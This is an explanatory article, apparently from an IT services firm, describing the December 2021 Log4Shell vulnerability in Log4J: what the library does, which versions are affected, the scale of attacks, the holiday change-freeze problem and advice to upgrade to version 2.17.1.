A critical vulnerability was discovered in the widely used logging utility, Log4J. December 2021 saw IT and security teams scramble to identify affected areas and apply drip-fed patches or workarounds issued by vendors.
The vulnerability, dubbed Log4Shell, is particularly easy to exploit and can allow attackers to execute code on servers remotely. This, coupled with the fact that Log4J is used in most developed java applications, makes remediation efforts particularly difficult.
Security experts say state-backed Chinese and Iranian hackers and rogue cryptocurrency miners have already started exploiting it.
What is Log4J?
Log4J is used to record events – like errors and routine system operations – that are then used by systems administrators and users. It’s an extremely popular open-source software created by the Apache Software Foundation and has been developed and maintained by volunteers. Log4J is used across many different platforms like Windows, MacOS, Linux and simply finding systems that use the utility is a challenge – it can be hidden under layers of other software.
Here’s an example of how Log4J works – when you type anything into a text box, click on a web link or click a button, a web server records that event in a log for the system administrators using Log4J. Events are captured for several reasons including troubleshooting, data analysis and statistics.
Log4J is both open-source and free, the library essentially touches every part of the internet.
The threat is real
Checkpoint revealed that over 800,000 attack attempts were made within 72 hours after the vulnerability was made public. They say that it is clearly one of the most serious vulnerabilities on the internet in recent years, and the potential for damage is incalculable.
Large organisations could easily have hundreds of vulnerable applications across thousands of devices that all need patches/fixes applied and thorough testing to be conducted. Systems and services that use Log4J between versions 2.0 and 2.15.0 (inclusive) are affected by this remote code execution vulnerability. Those running Apache Log4j between versions 2.0 and 2.16 (inclusive) are affected by a later discovered denial-of-service vulnerability.
Change Freeze Complication
An added complication of the remediation effort is that many organisations apply a “change freeze” on systems during the December/January period, meaning no changes or updates are allowed to be applied. This helps to maintain stability during a period where support staff are unavailable. An exception should be made to fix this vulnerability – especially on systems connected to the internet.
Because of the complexity in finding and patching this vulnerability, it may be with us for months, even years. Heed the warning from security experts and make sure all of your software is up to date. Upgrade your Log4j versions to the latest version. The current latest Log4j version is 2.17.1 which fixes both vulnerabilities.